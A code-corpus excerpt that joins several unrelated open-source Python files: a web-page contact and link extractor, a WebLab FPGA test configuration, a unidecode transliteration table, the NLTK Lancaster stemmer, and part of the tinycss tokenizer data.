email_regex = re.compile(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)")
phone_regex = re.compile(r"(?:(?:\+?1\s*(?:[.-]\s*)?)?(?:\(\s*([2-9]1[02-9]|[2-9][02-8]1|[2-9][02-8][02-9])\s*\)|([2-9]1[02-9]|[2-9][02-8]1|[2-9][02-8][02-9]))\s*(?:[.-]\s*)?)?([2-9]1[02-9]|[2-9][02-9]1|[2-9][02-9]{2})\s*(?:[.-]\s*)?([0-9]{4})(?:\s*(?:#|x\.?|ext\.?|extension)\s*(\d+))?")
class Webpage:
def __init__(self, html, url):
self.html = html
self.url = url
def parse(self):
soup = BeautifulSoup(self.html, "lxml")
strings = [string for string in soup.strings]
# find links
_found_links = []
def merge(url):
_found_links.append(url)
return urljoin(self.url, url)
links = [{"url": merge(a['href']), "name": _scrub(a.text) if _scrub(a.text) else a['href']} for a in soup.find_all("a") if a.get('href') is not None and a.get('href') is not "#" and a.get("href").startswith("mailto:") is not True and a.get("href") not in _found_links]
# find social media
social_media = {}
_social_media_sites = ["facebook.com", "youtube.com", "twitter.com", "linkedin.com", "github.com", "plus.google.com", "instagram.com"]
_social_media_urls = []
for link in links:
for site in _social_media_sites:
if site in link['url'].lower() and link['url'] not in _social_media_urls:
if not (site == "twitter.com" and "/intent/" in link['url']):
if site not in social_media:
social_media[site] = []
social_media[site].append(link)
_social_media_urls.append(link['url'])
del _social_media_sites, _social_media_urls
# find description
description = (soup.find('meta', attrs={'name':'og:description'}) or soup.find('meta', attrs={'property':'description'}) or soup.find('meta', attrs={'name':'description'}))
if description is not None:
description = description.get("content")
# find telephone numbers
telephones = []
i = 0
for string in strings:
for match in phone_regex.finditer(string):
extended = _get_desc_phone(strings, i)
number = match.group(0)
if len(match.string) > 100: # or _alpha_ratio(match.string) > 0.4:
break
if ("EIN" in match.string or "EIN" in extended) and ("tax" in match.string or "tax" in extended):
continue
if extended and extended == match.string:
if not len(_alpha(extended.replace(number, "")).strip()) > 0:
extended = None
elif extended.endswith(number):
extended = extended[:-(len(number))].strip()
if match.string is None:
continue
telephones.append({
"number": number,
"extended": extended
})
break
i += 1
# find emails
emails = []
_emails_alone = []
for email in [email for email in soup.find_all("a") if email.get("href") is not None and email.get("href").startswith("mailto:") is True]:
if email.get('href').startswith("mailto:"):
email_address = email.get("href")[7:]
if not email_address.startswith("?"):
if email_address in _emails_alone:
continue
email_description = email.text + " (" + _get_desc(email, minwords=4, maxlevels=2, doesnt_include=email_regex, repl=email_address) + ")"
emails.append({
"address": email_address,
"extended": _scrub(email_description)
})
_emails_alone.append(email_address)
for string in [s for s in strings if email_regex.match(s)]:
for match in email_regex.finditer(string):
if match.string not in _emails_alone:
_emails_alone.append(match.string)
emails.append({
"address": match.string,
"extended": string
})
del _emails_alone # might as well, save memory
return {
"links": links,
"url": self.url,
"social_media": social_media,
"description": description,
"telephones": telephones,
"emails": emails
}
def _get_desc_phone(strings, i):
extended = strings[i]
if len(re.sub(phone_regex, "", extended).strip()) > 0:
return extended
j = i - 1
while len(extended) < 100:
try:
previous = strings[j]
if not phone_regex.match(previous): # if there is a phone number in the extended text, we are probably outside the relevant boundary
extended = strings[j] + " " + extended
else:
break
except IndexError:
break
j -= 1
extended = _scrub(extended)
if _alpha_ratio(extended) < 0.5:
return strings[i]
return extended
def _get_desc(element, minwords=3, maxlength=140, maxlevels=3, doesnt_include=None, repl=""):
levels = 0
desc = element.getText()
previous = element
while len(desc.split(" ")) <= minwords and levels <= maxlevels:
if previous is None:
break
new_desc = previous.getText(separator=u' ')
if doesnt_include is not None and doesnt_include.match(new_desc.replace(repl, "")):
break
if _alpha_ratio(new_desc) < 0.7:
break
desc = new_desc
if len(previous.parent.text) > len(previous.text)*8:
previous = previous.previousSibling
while isinstance(previous, bs4.element.NavigableString):
previous = previous.previousSibling
else:
previous = previous.parent
levels += 1
if len(desc) > maxlength:
return "..." + desc[-maxlength:]
return desc
def _scrub(string):
string = string.strip()
string = string.replace(" , ", ", ")
string = string.replace("\\n", " ")
if string.startswith(", "):
string = string[2:]
while " " in string:
string = string.replace(" ", " ")
return string.strip()
def webpage_from_url(url):
return Webpage(requests.get(url).text, url)
def _alpha_ratio(string):
only = _alpha(string)
ratio = len(only) / (len(string) + 0.01)
return ratio
def _alpha(string):
only = re.sub(r'\W+', '', string)
return only
# simple alias for constructor
def webpage_from_text(html, url=""):
return Webpage(html, url)
def recursive_parse(url, verbose=False, max_depth=1, local=True):
hostname = urlparse(url).hostname
if verbose:
print "Recursively parsing site with max depth of " + str(max_depth) + " @ " + url
responses = []
queue = Queue()
queue.put((0, url))
seen_urls = []
while queue.qsize() > 0:
level, url = queue.get()
seen_urls.append(url.lower())
if verbose:
print ' ' + (" "*level) + " - " + url
response = webpage_from_url(url).parse()
responses.append(response)
if level + 1 <= max_depth:
for link in response['links']:
href = link['url']
if href.lower() not in seen_urls:
if (not local) or (urlparse(href).hostname == hostname):
queue.put((level + 1, href))
seen_urls.append(href.lower())
def merge_responses(*responses):
out = {
"links": [],
"social_media": {},
"urls": {},
"telephones": [],
"emails": []
}
_seen_links = []
_seen_emails = []
for response in responses:
for link in response['links']:
# computational complexity: O(n^2) :)
if link['url'] not in _seen_links:
out['links'].append(link)
_seen_links.append(link['url'])
for k,v in response['social_media'].items():
if k not in out['social_media']:
out['social_media'][k] = []
out['social_media'][k]
| mit |
ganeshgore/myremolab | server/launch/sample_balanced2_concurrent_experiments/main_machine/lab_and_experiment2/experiment49/server_config.py | 242 | 1525 | #!/usr/bin/env python
#-*-*- encoding: utf-8 -*-*-
weblab_xilinx_experiment_xilinx_device = 'FPGA'
weblab_xilinx_experiment_port_number = 1
# This should be something like this:
# import os as _os
# xilinx_home = _os.getenv('XILINX_HOME')
# if xilinx_home == None:
# if _os.name == 'nt':
# xilinx_home = r'C:\Program Files\Xilinx'
# elif _os.name == 'posix':
# xilinx_home = r"/home/nctrun/Xilinx"
#
# if _os.name == 'nt':
# xilinx_impact_full_path = [xilinx_home + r'\bin\nt\impact']
# elif _os.name == 'posix':
# xilinx_impact_full_path = [xilinx_home + r'/bin/lin/impact']
# But for testing we are going to fake it:
xilinx_home = "."
xilinx_impact_full_path = ["python","./tests/unit/weblab/experiment/devices/xilinx_impact/fake_impact.py" ]
xilinx_device_to_program = 'XilinxImpact' # 'JTagBlazer', 'DigilentAdept'
xilinx_device_to_send_commands = 'SerialPort' # 'HttpDevice'
digilent_adept_full_path = ["python","./test/unit/weblab/experiment/devices/digilent_adept/fake_digilent_adept.py" ]
digilent_adept_batch_content = """something with the variable $FILE"""
xilinx_http_device_ip_FPGA = "192.168.50.138"
xilinx_http_device_port_FPGA = 80
xilinx_http_device_app_FPGA = ""
xilinx_batch_content_FPGA = """setMode -bs
setCable -port auto
addDevice -position 1 -file $FILE
Program -p 1
exit
"""
# Though it is not really a FPGA, the webcam url var name depends on the device,
# specified above.
fpga_webcam_url = '''https://www.weblab.deusto.es/webcam/fpga0/image.jpg''' | bsd-2-clause |
mrquim/repository.mrquim | script.module.unidecode/lib/unidecode/x08a.py | 253 | 4647 | data = (
'Yan ', # 0x00
'Yan ', # 0x01
'Ding ', # 0x02
'Fu ', # 0x03
'Qiu ', # 0x04
'Qiu ', # 0x05
'Jiao ', # 0x06
'Hong ', # 0x07
'Ji ', # 0x08
'Fan ', # 0x09
'Xun ', # 0x0a
'Diao ', # 0x0b
'Hong ', # 0x0c
'Cha ', # 0x0d
'Tao ', # 0x0e
'Xu ', # 0x0f
'Jie ', # 0x10
'Yi ', # 0x11
'Ren ', # 0x12
'Xun ', # 0x13
'Yin ', # 0x14
'Shan ', # 0x15
'Qi ', # 0x16
'Tuo ', # 0x17
'Ji ', # 0x18
'Xun ', # 0x19
'Yin ', # 0x1a
'E ', # 0x1b
'Fen ', # 0x1c
'Ya ', # 0x1d
'Yao ', # 0x1e
'Song ', # 0x1f
'Shen ', # 0x20
'Yin ', # 0x21
'Xin ', # 0x22
'Jue ', # 0x23
'Xiao ', # 0x24
'Ne ', # 0x25
'Chen ', # 0x26
'You ', # 0x27
'Zhi ', # 0x28
'Xiong ', # 0x29
'Fang ', # 0x2a
'Xin ', # 0x2b
'Chao ', # 0x2c
'She ', # 0x2d
'Xian ', # 0x2e
'Sha ', # 0x2f
'Tun ', # 0x30
'Xu ', # 0x31
'Yi ', # 0x32
'Yi ', # 0x33
'Su ', # 0x34
'Chi ', # 0x35
'He ', # 0x36
'Shen ', # 0x37
'He ', # 0x38
'Xu ', # 0x39
'Zhen ', # 0x3a
'Zhu ', # 0x3b
'Zheng ', # 0x3c
'Gou ', # 0x3d
'Zi ', # 0x3e
'Zi ', # 0x3f
'Zhan ', # 0x40
'Gu ', # 0x41
'Fu ', # 0x42
'Quan ', # 0x43
'Die ', # 0x44
'Ling ', # 0x45
'Di ', # 0x46
'Yang ', # 0x47
'Li ', # 0x48
'Nao ', # 0x49
'Pan ', # 0x4a
'Zhou ', # 0x4b
'Gan ', # 0x4c
'Yi ', # 0x4d
'Ju ', # 0x4e
'Ao ', # 0x4f
'Zha ', # 0x50
'Tuo ', # 0x51
'Yi ', # 0x52
'Qu ', # 0x53
'Zhao ', # 0x54
'Ping ', # 0x55
'Bi ', # 0x56
'Xiong ', # 0x57
'Qu ', # 0x58
'Ba ', # 0x59
'Da ', # 0x5a
'Zu ', # 0x5b
'Tao ', # 0x5c
'Zhu ', # 0x5d
'Ci ', # 0x5e
'Zhe ', # 0x5f
'Yong ', # 0x60
'Xu ', # 0x61
'Xun ', # 0x62
'Yi ', # 0x63
'Huang ', # 0x64
'He ', # 0x65
'Shi ', # 0x66
'Cha ', # 0x67
'Jiao ', # 0x68
'Shi ', # 0x69
'Hen ', # 0x6a
'Cha ', # 0x6b
'Gou ', # 0x6c
'Gui ', # 0x6d
'Quan ', # 0x6e
'Hui ', # 0x6f
'Jie ', # 0x70
'Hua ', # 0x71
'Gai ', # 0x72
'Xiang ', # 0x73
'Wei ', # 0x74
'Shen ', # 0x75
'Chou ', # 0x76
'Tong ', # 0x77
'Mi ', # 0x78
'Zhan ', # 0x79
'Ming ', # 0x7a
'E ', # 0x7b
'Hui ', # 0x7c
'Yan ', # 0x7d
'Xiong ', # 0x7e
'Gua ', # 0x7f
'Er ', # 0x80
'Beng ', # 0x81
'Tiao ', # 0x82
'Chi ', # 0x83
'Lei ', # 0x84
'Zhu ', # 0x85
'Kuang ', # 0x86
'Kua ', # 0x87
'Wu ', # 0x88
'Yu ', # 0x89
'Teng ', # 0x8a
'Ji ', # 0x8b
'Zhi ', # 0x8c
'Ren ', # 0x8d
'Su ', # 0x8e
'Lang ', # 0x8f
'E ', # 0x90
'Kuang ', # 0x91
'E ', # 0x92
'Shi ', # 0x93
'Ting ', # 0x94
'Dan ', # 0x95
'Bo ', # 0x96
'Chan ', # 0x97
'You ', # 0x98
'Heng ', # 0x99
'Qiao ', # 0x9a
'Qin ', # 0x9b
'Shua ', # 0x9c
'An ', # 0x9d
'Yu ', # 0x9e
'Xiao ', # 0x9f
'Cheng ', # 0xa0
'Jie ', # 0xa1
'Xian ', # 0xa2
'Wu ', # 0xa3
'Wu ', # 0xa4
'Gao ', # 0xa5
'Song ', # 0xa6
'Pu ', # 0xa7
'Hui ', # 0xa8
'Jing ', # 0xa9
'Shuo ', # 0xaa
'Zhen ', # 0xab
'Shuo ', # 0xac
'Du ', # 0xad
'Yasashi ', # 0xae
'Chang ', # 0xaf
'Shui ', # 0xb0
'Jie ', # 0xb1
'Ke ', # 0xb2
'Qu ', # 0xb3
'Cong ', # 0xb4
'Xiao ', # 0xb5
'Sui ', # 0xb6
'Wang ', # 0xb7
'Xuan ', # 0xb8
'Fei ', # 0xb9
'Chi ', # 0xba
'Ta ', # 0xbb
'Yi ', # 0xbc
'Na ', # 0xbd
'Yin ', # 0xbe
'Diao ', # 0xbf
'Pi ', # 0xc0
'Chuo ', # 0xc1
'Chan ', # 0xc2
'Chen ', # 0xc3
'Zhun ', # 0xc4
'Ji ', # 0xc5
'Qi ', # 0xc6
'Tan ', # 0xc7
'Zhui ', # 0xc8
'Wei ', # 0xc9
'Ju ', # 0xca
'Qing ', # 0xcb
'Jian ', # 0xcc
'Zheng ', # 0xcd
'Ze ', # 0xce
'Zou ', # 0xcf
'Qian ', # 0xd0
'Zhuo ', # 0xd1
'Liang ', # 0xd2
'Jian ', # 0xd3
'Zhu ', # 0xd4
'Hao ', # 0xd5
'Lun ', # 0xd6
'Shen ', # 0xd7
'Biao ', # 0xd8
'Huai ', # 0xd9
'Pian ', # 0xda
'Yu ', # 0xdb
'Die ', # 0xdc
'Xu ', # 0xdd
'Pian ', # 0xde
'Shi ', # 0xdf
'Xuan ', # 0xe0
'Shi ', # 0xe1
'Hun ', # 0xe2
'Hua ', # 0xe3
'E ', # 0xe4
'Zhong ', # 0xe5
'Di ', # 0xe6
'Xie ', # 0xe7
'Fu ', # 0xe8
'Pu ', # 0xe9
'Ting ', # 0xea
'Jian ', # 0xeb
'Qi ', # 0xec
'Yu ', # 0xed
'Zi ', # 0xee
'Chuan ', # 0xef
'Xi ', # 0xf0
'Hui ', # 0xf1
'Yin ', # 0xf2
'An ', # 0xf3
'Xian ', # 0xf4
'Nan ', # 0xf5
'Chen ', # 0xf6
'Feng ', # 0xf7
'Zhu ', # 0xf8
'Yang ', # 0xf9
'Yan ', # 0xfa
'Heng ', # 0xfb
'Xuan ', # 0xfc
'Ge ', # 0xfd
'Nuo ', # 0xfe
'Qi ', # 0xff
)
| gpl-2.0 |
sivu22/nltk-on-gae | GAE/nltk/stem/lancaster.py | 5 | 11216 | # Natural Language Toolkit: Stemmers
#
# Copyright (C) 2001-2012 NLTK Project
# Author: Steven Tomcavage <stomcava@law.upenn.edu>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
"""
A word stemmer based on the Lancaster stemming algorithm.
Paice, Chris D. "Another Stemmer." ACM SIGIR Forum 24.3 (1990): 56-61.
"""
import re
from api import StemmerI
class LancasterStemmer(StemmerI):
"""
Lancaster Stemmer
>>> from nltk.stem.lancaster import LancasterStemmer
>>> st = LancasterStemmer()
>>> st.stem('maximum') # Remove "-um" when word is intact
'maxim'
>>> st.stem('presumably') # Don't remove "-um" when word is not intact
'presum'
>>> st.stem('multiply') # No action taken if word ends with "-ply"
'multiply'
>>> st.stem('provision') # Replace "-sion" with "-j" to trigger "j" set of rules
'provid'
>>> st.stem('owed') # Word starting with vowel must contain at least 2 letters
'ow'
>>> st.stem('ear') # ditto
'ear'
>>> st.stem('saying') # Words starting with consonant must contain at least 3
'say'
>>> st.stem('crying') # letters and one of those letters must be a vowel
'cry'
>>> st.stem('string') # ditto
'string'
>>> st.stem('meant') # ditto
'meant'
>>> st.stem('cement') # ditto
'cem'
"""
# The rule list is static since it doesn't change between instances
rule_tuple = (
"ai*2.", # -ia > - if intact
"a*1.", # -a > - if intact
"bb1.", # -bb > -b
"city3s.", # -ytic > -ys
"ci2>", # -ic > -
"cn1t>", # -nc > -nt
"dd1.", # -dd > -d
"dei3y>", # -ied > -y
"deec2ss.", # -ceed >", -cess
"dee1.", # -eed > -ee
"de2>", # -ed > -
"dooh4>", # -hood > -
"e1>", # -e > -
"feil1v.", # -lief > -liev
"fi2>", # -if > -
"gni3>", # -ing > -
"gai3y.", # -iag > -y
"ga2>", # -ag > -
"gg1.", # -gg > -g
"ht*2.", # -th > - if intact
"hsiug5ct.", # -guish > -ct
"hsi3>", # -ish > -
"i*1.", # -i > - if intact
"i1y>", # -i > -y
"ji1d.", # -ij > -id -- see nois4j> & vis3j>
"juf1s.", # -fuj > -fus
"ju1d.", # -uj > -ud
"jo1d.", # -oj > -od
"jeh1r.", # -hej > -her
"jrev1t.", # -verj > -vert
"jsim2t.", # -misj > -mit
"jn1d.", # -nj > -nd
"j1s.", # -j > -s
"lbaifi6.", # -ifiabl > -
"lbai4y.", # -iabl > -y
"lba3>", # -abl > -
"lbi3.", # -ibl > -
"lib2l>", # -bil > -bl
"lc1.", # -cl > c
"lufi4y.", # -iful > -y
"luf3>", # -ful > -
"lu2.", # -ul > -
"lai3>", # -ial > -
"lau3>", # -ual > -
"la2>", # -al > -
"ll1.", # -ll > -l
"mui3.", # -ium > -
"mu*2.", # -um > - if intact
"msi3>", # -ism > -
"mm1.", # -mm > -m
"nois4j>", # -sion > -j
"noix4ct.", # -xion > -ct
"noi3>", # -ion > -
"nai3>", # -ian > -
"na2>", # -an > -
"nee0.", # protect -een
"ne2>", # -en > -
"nn1.", # -nn > -n
"pihs4>", # -ship > -
"pp1.", # -pp > -p
"re2>", # -er > -
"rae0.", # protect -ear
"ra2.", # -ar > -
"ro2>", # -or > -
"ru2>", # -ur > -
"rr1.", # -rr > -r
"rt1>", # -tr > -t
"rei3y>", # -ier > -y
"sei3y>", # -ies > -y
"sis2.", # -sis > -s
"si2>", # -is > -
"ssen4>", # -ness > -
"ss0.", # protect -ss
"suo3>", # -ous > -
"su*2.", # -us > - if intact
"s*1>", # -s > - if intact
"s0.", # -s > -s
"tacilp4y.", # -plicat > -ply
"ta2>", # -at > -
"tnem4>", # -ment > -
"tne3>", # -ent > -
"tna3>", # -ant > -
"tpir2b.", # -ript > -rib
"tpro2b.", # -orpt > -orb
"tcud1.", # -duct > -duc
"tpmus2.", # -sumpt > -sum
"tpec2iv.", # -cept > -ceiv
"tulo2v.", # -olut > -olv
"tsis0.", # protect -sist
"tsi3>", # -ist > -
"tt1.", # -tt > -t
"uqi3.", # -iqu > -
"ugo1.", # -ogu > -og
"vis3j>", # -siv > -j
"vie0.", # protect -eiv
"vi2>", # -iv > -
"ylb1>", # -bly > -bl
"yli3y>", # -ily > -y
"ylp0.", # protect -ply
"yl2>", # -ly > -
"ygo1.", # -ogy > -og
"yhp1.", # -phy > -ph
"ymo1.", # -omy > -om
"ypo1.", # -opy > -op
"yti3>", # -ity > -
"yte3>", # -ety > -
"ytl2.", # -lty > -l
"yrtsi5.", # -istry > -
"yra3>", # -ary > -
"yro3>", # -ory > -
"yfi3.", # -ify > -
"ycn2t>", # -ncy > -nt
"yca3>", # -acy > -
"zi2>", # -iz > -
"zy1s." # -yz > -ys
)
def __init__(self):
"""Create an instance of the Lancaster stemmer.
"""
# Setup an empty rule dictionary - this will be filled in later
self.rule_dictionary = {}
def parseRules(self, rule_tuple):
"""Validate the set of rules used in this stemmer.
"""
valid_rule = re.compile("^[a-z]+\*?\d[a-z]*[>\.]?$")
# Empty any old rules from the rule set before adding new ones
self.rule_dictionary = {}
for rule in rule_tuple:
if not valid_rule.match(rule):
raise ValueError("The rule %s is invalid" % rule)
first_letter = rule[0:1]
if first_letter in self.rule_dictionary:
self.rule_dictionary[first_letter].append(rule)
else:
self.rule_dictionary[first_letter] = [rule]
def stem(self, word):
"""Stem a word using the Lancaster stemmer.
"""
# Lower-case the word, since all the rules are lower-cased
word = word.lower()
# Save a copy of the original word
intact_word = word
# If the user hasn't supplied any rules, setup the default rules
if len(self.rule_dictionary) == 0:
self.parseRules(LancasterStemmer.rule_tuple)
return self.__doStemming(word, intact_word)
def __doStemming(self, word, intact_word):
"""Perform the actual word stemming
"""
valid_rule = re.compile("^([a-z]+)(\*?)(\d)([a-z]*)([>\.]?)$")
proceed = True
while proceed:
# Find the position of the last letter of the word to be stemmed
last_letter_position = self.__getLastLetter(word)
# Only stem the word if it has a last letter and a rule matching that last letter
if last_letter_position < 0 or word[last_letter_position] not in self.rule_dictionary:
proceed = False
else:
rule_was_applied = False
# Go through each rule that matches the word's final letter
for rule in self.rule_dictionary[word[last_letter_position]]:
rule_match = valid_rule.match(rule)
if rule_match:
(ending_string,
intact_flag,
remove_total,
append_string,
cont_flag) = rule_match.groups()
# Convert the number of chars to remove when stemming
# from a string to an integer
remove_total = int(remove_total)
# Proceed if word's ending matches rule's word ending
if word.endswith(ending_string[::-1]):
if intact_flag:
if (word == intact_word and
self.__isAcceptable(word, remove_total)):
word = self.__applyRule(word,
remove_total,
append_string)
rule_was_applied = True
if cont_flag == '.':
proceed = False
break
elif self.__isAcceptable(word, remove_total):
word = self.__applyRule(word,
remove_total,
append_string)
rule_was_applied = True
if cont_flag == '.':
proceed = False
break
# If no rules apply, the word doesn't need any more stemming
if rule_was_applied == False:
proceed = False
return word
def __getLastLetter(self, word):
"""Get the zero-based index of the last alphabetic character in this string
"""
last_letter = -1
for position in range(len(word)):
if word[position].isalpha():
last_letter = position
else:
break
return last_letter
def __isAcceptable(self, word, remove_total):
"""Determine if the word is acceptable for stemming.
"""
word_is_acceptable = False
# If the word starts with a vowel, it must be at least 2
# characters long to be stemmed
if word[0] in "aeiouy":
if (len(word) - remove_total >= 2):
word_is_acceptable = True
# If the word starts with a consonant, it must be at least 3
# characters long (including one vowel) to be stemmed
elif (len(word) - remove_total >= 3):
if word[1] in "aeiouy":
word_is_acceptable = True
elif word[2] in "aeiouy":
word_is_acceptable = True
return word_is_acceptable
def __applyRule(self, word, remove_total, append_string):
"""Apply the stemming rule to the word
"""
# Remove letters from the end of the word
new_word_length = len(word) - remove_total
word = word[0:new_word_length]
# And add new letters to the end of the truncated word
if append_string:
word += append_string
return word
def __repr__(self):
return '<LancasterStemmer>'
if __name__ == "__main__":
import doctest
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
| apache-2.0 |
user-none/calibre | src/tinycss/token_data.py | 19 | 13497 | # coding: utf8
"""
tinycss.token_data
------------------
Shared data for both implementations (Cython and Python) of the tokenizer.
:copyright: (c) 2012 by Simon Sapin.
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals
import re
import sys
import operator
import functools
import string
# * Raw strings with the r'' notation are used so that \ do not need
# to be escaped.
# * Names and regexps are separated by a tabulation.
# * Macros are re-ordered so that only previous definitions are needed.
# * {} are used for macro substitution with ``string.Formatter``,
# so other uses of { or } have been doubled.
# * The syntax is otherwise compatible with re.compile.
# * Some parentheses were added to add capturing groups.
# (in unicode, DIMENSION and URI)
# *** Willful violation: ***
# Numbers can take a + or - sign, but the sign is a separate DELIM token.
# Since comments are allowed anywhere between tokens, this makes
# the following this is valid. It means 10 negative pixels:
# margin-top: -/**/10px
# This makes parsing numbers a pain, so instead we’ll do the same is Firefox
# and make the sign part as of the 'num' macro. The above CSS will be invalid.
# See discussion:
# http://lists.w3.org/Archives/Public/www-style/2011Oct/0028.html
MACROS = r'''
nl \n|\r\n|\r|\f
w [ \t\r\n\f]*
nonascii [^\0-\237]
unicode \\([0-9a-f]{{1,6}})(\r\n|[ \n\r\t\f])?
simple_escape [^\n\r\f0-9a-f]
escape {unicode}|\\{simple_escape}
nmstart [_a-z]|{nonascii}|{escape}
nmchar [_a-z0-9-]|{nonascii}|{escape}
name {nmchar}+
ident [-]?{nmstart}{nmchar}*
num [-+]?(?:[0-9]*\.[0-9]+|[0-9]+)
string1 \"([^\n\r\f\\"]|\\{nl}|{escape})*\"
string2 \'([^\n\r\f\\']|\\{nl}|{escape})*\'
string {string1}|{string2}
badstring1 \"([^\n\r\f\\"]|\\{nl}|{escape})*\\?
badstring2 \'([^\n\r\f\\']|\\{nl}|{escape})*\\?
badstring {badstring1}|{badstring2}
badcomment1 \/\*[^*]*\*+([^/*][^*]*\*+)*
badcomment2 \/\*[^*]*(\*+[^/*][^*]*)*
badcomment {badcomment1}|{badcomment2}
baduri1 url\({w}([!#$%&*-~]|{nonascii}|{escape})*{w}
baduri2 url\({w}{string}{w}
baduri3 url\({w}{badstring}
baduri {baduri1}|{baduri2}|{baduri3}
'''.replace(r'\0', '\0').replace(r'\237', '\237')
# Removed these tokens. Instead, they’re tokenized as two DELIM each.
# INCLUDES ~=
# DASHMATCH |=
# They are only used in selectors but selectors3 also have ^=, *= and $=.
# We don’t actually parse selectors anyway
# Re-ordered so that the longest match is always the first.
# For example, "url('foo')" matches URI, BAD_URI, FUNCTION and IDENT,
# but URI would always be a longer match than the others.
TOKENS = r'''
S [ \t\r\n\f]+
URI url\({w}({string}|([!#$%&*-\[\]-~]|{nonascii}|{escape})*){w}\)
BAD_URI {baduri}
FUNCTION {ident}\(
UNICODE-RANGE u\+[0-9a-f?]{{1,6}}(-[0-9a-f]{{1,6}})?
IDENT {ident}
ATKEYWORD @{ident}
HASH #{name}
DIMENSION ({num})({ident})
PERCENTAGE {num}%
NUMBER {num}
STRING {string}
BAD_STRING {badstring}
COMMENT \/\*[^*]*\*+([^/*][^*]*\*+)*\/
BAD_COMMENT {badcomment}
: :
; ;
{ \{{
} \}}
( \(
) \)
[ \[
] \]
CDO <!--
CDC -->
'''
# Strings with {macro} expanded
COMPILED_MACROS = {}
COMPILED_TOKEN_REGEXPS = [] # [(name, regexp.match)] ordered
COMPILED_TOKEN_INDEXES = {} # {name: i} helper for the C speedups
# Indexed by codepoint value of the first character of a token.
# Codepoints >= 160 (aka nonascii) all use the index 160.
# values are (i, name, regexp.match)
TOKEN_DISPATCH = []
try:
unichr
except NameError:
# Python 3
unichr = chr
unicode = str
def _init():
"""Import-time initialization."""
COMPILED_MACROS.clear()
for line in MACROS.splitlines():
if line.strip():
name, value = line.split('\t')
COMPILED_MACROS[name.strip()] = '(?:%s)' \
% value.format(**COMPILED_MACROS)
COMPILED_TOKEN_REGEXPS[:] = (
(
name.strip(),
re.compile(
value.format(**COMPILED_MACROS),
# Case-insensitive when matching eg. uRL(foo)
# but preserve the case in extracted groups
re.I
).match
)
for line in TOKENS.splitlines()
if line.strip()
for name, value in [line.split('\t')]
)
COMPILED_TOKEN_INDEXES.clear()
for i, (name, regexp) in enumerate(COMPILED_TOKEN_REGEXPS):
COMPILED_TOKEN_INDEXES[name] = i
dispatch = [[] for i in range(161)]
for chars, names in [
(' \t\r\n\f', ['S']),
('uU', ['URI', 'BAD_URI', 'UNICODE-RANGE']),
# \ is an escape outside of another token
(string.ascii_letters + '\\_-' + unichr(160), ['FUNCTION', 'IDENT']),
(string.digits + '.+-', ['DIMENSION', 'PERCENTAGE', 'NUMBER']),
('@', ['ATKEYWORD']),
('#', ['HASH']),
('\'"', ['STRING', 'BAD_STRING']),
('/', ['COMMENT', 'BAD_COMMENT']),
('<', ['CDO']),
('-', ['CDC']),
]:
for char in chars:
dispatch[ord(char)].extend(names)
for char in ':;{}()[]':
dispatch[ord(char)] = [char]
TOKEN_DISPATCH[:] = (
[
(index,) + COMPILED_TOKEN_REGEXPS[index]
for name in names
for index in [COMPILED_TOKEN_INDEXES[name]]
]
for names in dispatch
)
_init()
def _unicode_replace(match, int=int, unichr=unichr, maxunicode=sys.maxunicode):
codepoint = int(match.group(1), 16)
if codepoint <= maxunicode:
return unichr(codepoint)
else:
return '\N{REPLACEMENT CHARACTER}' # U+FFFD
UNICODE_UNESCAPE = functools.partial(
re.compile(COMPILED_MACROS['unicode'], re.I).sub,
_unicode_replace)
NEWLINE_UNESCAPE = functools.partial(
re.compile(r'()\\' + COMPILED_MACROS['nl']).sub,
'')
SIMPLE_UNESCAPE = functools.partial(
re.compile(r'\\(%s)' % COMPILED_MACROS['simple_escape'] , re.I).sub,
# Same as r'\1', but faster on CPython
operator.methodcaller('group', 1))
FIND_NEWLINES = lambda x : list(re.compile(COMPILED_MACROS['nl']).finditer(x))
class Token(object):
"""A single atomic token.
.. attribute:: is_container
Always ``False``.
Helps to tell :class:`Token` apart from :class:`ContainerToken`.
.. attribute:: type
The type of token as a string:
``S``
A sequence of white space
``IDENT``
An identifier: a name that does not start with a digit.
A name is a sequence of letters, digits, ``_``, ``-``, escaped
characters and non-ASCII characters. Eg: ``margin-left``
``HASH``
``#`` followed immediately by a name. Eg: ``#ff8800``
``ATKEYWORD``
``@`` followed immediately by an identifier. Eg: ``@page``
``URI``
Eg: ``url(foo)`` The content may or may not be quoted.
``UNICODE-RANGE``
``U+`` followed by one or two hexadecimal
Unicode codepoints. Eg: ``U+20-00FF``
``INTEGER``
An integer with an optional ``+`` or ``-`` sign
``NUMBER``
A non-integer number with an optional ``+`` or ``-`` sign
``DIMENSION``
An integer or number followed immediately by an
identifier (the unit). Eg: ``12px``
``PERCENTAGE``
An integer or number followed immediately by ``%``
``STRING``
A string, quoted with ``"`` or ``'``
``:`` or ``;``
That character.
``DELIM``
A single character not matched in another token. Eg: ``,``
See the source of the :mod:`.token_data` module for the precise
regular expressions that match various tokens.
Note that other token types exist in the early tokenization steps,
but these are ignored, are syntax errors, or are later transformed
into :class:`ContainerToken` or :class:`FunctionToken`.
.. attribute:: value
The parsed value:
* INTEGER, NUMBER, PERCENTAGE or DIMENSION tokens: the numeric value
as an int or float.
* STRING tokens: the unescaped string without quotes
* URI tokens: the unescaped URI without quotes or
``url(`` and ``)`` markers.
* IDENT, ATKEYWORD or HASH tokens: the unescaped token,
with ``@`` or ``#`` markers left as-is
* Other tokens: same as :attr:`as_css`
*Unescaped* refers to the various escaping methods based on the
backslash ``\`` character in CSS syntax.
.. attribute:: unit
* DIMENSION tokens: the normalized (unescaped, lower-case)
unit name as a string. eg. ``'px'``
* PERCENTAGE tokens: the string ``'%'``
* Other tokens: ``None``
.. attribute:: line
The line number in the CSS source of the start of this token.
.. attribute:: column
The column number (inside a source line) of the start of this token.
"""
is_container = False
__slots__ = 'type', '_as_css', 'value', 'unit', 'line', 'column'
def __init__(self, type_, css_value, value, unit, line, column):
self.type = type_
self._as_css = css_value
self.value = value
self.unit = unit
self.line = line
self.column = column
def as_css(self):
"""
Return as an Unicode string the CSS representation of the token,
as parsed in the source.
"""
return self._as_css
def __repr__(self):
return ('<Token {0.type} at {0.line}:{0.column} {0.value!r}{1}>'
.format(self, self.unit or ''))
class ContainerToken(object):
"""A token that contains other (nested) tokens.
.. attribute:: is_container
Always ``True``.
Helps to tell :class:`ContainerToken` apart from :class:`Token`.
.. attribute:: type
